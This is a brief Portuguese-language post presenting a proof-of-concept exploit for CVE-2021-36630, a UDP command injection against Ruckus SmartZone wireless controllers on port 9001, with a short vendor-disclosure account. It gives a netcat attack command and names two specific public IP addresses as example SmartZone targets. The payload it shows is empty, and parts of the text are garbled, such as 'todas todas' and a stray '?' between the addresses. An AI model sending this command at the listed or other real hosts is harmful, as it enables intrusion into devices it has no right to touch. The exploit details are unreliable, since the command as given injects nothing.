
Exploit de prova de conceito para CVE-2021-36630 visando controladores sem fio Ruckus SmartZone via injeção de comando UDP na porta 9001.
Os dispositivos da série SmartZone da Ruckus apresentam riscos de segurança. Após notificar o fabricante, eles organizaram ativamente pessoal técnico para conduzir investigações. Durante esse período, também fornecemos sugestões de segurança e métodos de verificação várias vezes. Em 19 de julho, a empresa emitiu oficialmente um comunicado de segurança.
Comando de ataque: echo "" | nc -4u ip:address 9001
exemplo de endereço IP: 62.210.8.110?111.107.251.71(IP do RuckusWireless SZ)

SmartZone-100 - todas todas - Virtual SmartZone
http://ruckus.com http://smartzone-100.com https://anquan.baidu.com/article/1434